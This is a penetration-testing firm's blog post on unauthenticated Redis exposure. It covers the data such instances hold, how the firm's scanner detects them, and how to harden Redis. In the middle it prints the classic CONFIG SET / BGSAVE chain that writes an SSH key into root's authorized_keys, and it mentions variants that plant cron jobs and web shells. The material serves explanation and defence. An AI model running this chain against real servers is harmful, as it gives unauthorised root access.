Valtik Studios
Back to blog
RediscriticalUpdated 2026-04-17orig. 2026-01-049 min

Redis: CONFIG GET requirepass Returns Empty

Redis deployed without authentication is one of the most exploited misconfigurations on the internet. Attackers use CONFIG SET to write SSH keys, webshells, and cron jobs for persistent remote code execution. A penetration testing reference for Redis security hardening and incident response.

Phillip (Tre) Bucchi headshot
Phillip (Tre) Bucchi·Founder, Valtik Studios. Penetration Tester

Founder of Valtik Studios. Penetration tester. Based in Connecticut, serving US mid-market.

Why unauthenticated Redis is still exploitable in 2026

Redis published ACLs in 6.0. That was mid-2020. Redis 7 shipped in 2022. Every Redis instance deployed in the last five years has had user/password/ACL support available out of the box.

We still find unauthenticated Redis every month. Sometimes on misconfigured Kubernetes clusters. Sometimes on legacy VMs that haven't been touched since 2019. Sometimes on cloud instances where someone added a public IP for "quick debugging" and never removed it.

What happens when we find one is straightforward. We pop a shell.

The default configuration

Redis binds to all interfaces (bind 0.0.0.0) and requires no password (requirepass is empty). If port 6379 is reachable, you have full access. No concept of users, roles, or permissions in default Redis.

What's in a Redis instance

Redis is used as a cache, session store, message broker, and rate limiter. A typical exposed instance contains:

  • Session tokens. full session objects with user IDs, roles, and preferences
  • API cache. cached API responses containing user data
  • Rate limit counters. revealing internal rate limit thresholds
  • Job queues. Sidekiq/Bull/Celery job payloads with function arguments

From cache access to server compromise

Redis supports the CONFIG SET command, which can change server configuration at runtime. The classic attack chain:

  1. CONFIG SET dir /root/.ssh
  2. CONFIG SET dbfilename authorized_keys
  3. SET payload "\\nssh-rsa AAAA...your-key...\\n"
  4. BGSAVE

This writes your SSH public key into the root user's authorized_keys file. You now have SSH root access to the server.

The same technique works with cron jobs (/var/spool/cron/root) and web shells (/var/www/html/shell.php).

How we detect this

Our scanner:

  1. Connects to port 6379 and sends PING (expects PONG)
  2. Runs INFO server to get version, OS, and configuration
  3. Runs CONFIG GET requirepass to verify no password
  4. Runs DBSIZE and KEYS * (sampled) to assess data exposure

Defense

  • Set a strong password: requirepass your-strong-password-here
  • Bind to localhost only: bind 127.0.0.1
  • Disable dangerous commands: rename-command CONFIG ""
  • Enable TLS (Redis 6+)
  • Use ACLs (Redis 6+) for per-user permissions
redisrcemisconfigurationpenetration testingvulnerability assessmentincident responsecloud securityresearch

Want us to check your Redis setup?

Our scanner detects this exact misconfiguration. plus dozens more across 38 platforms. Free website check available, no commitment required.

Free Security CheckRequest Full Audit
Get new research in your inbox
No spam. No newsletter filler. Only new posts as they publish.
Related Reading
Firebase12 min
Firebase: Anonymous Auth With Open Firestore Rules
Firebase allows anonymous authentication by default. Combined with permissive Firestore security rules, the infamous allow read, write: if t
Elasticsearch13 min
Elasticsearch: The Open Cluster Epidemic
Elasticsearch ships with no authentication by default. The _search endpoint returns every indexed document, _cat/indices lists every index,
MinIO10 min
MinIO: When Your S3-Compatible Storage Lists Everything
MinIO is S3-compatible object storage widely used in self-hosted cloud deployments. Misconfigured anonymous access policies expose entire bu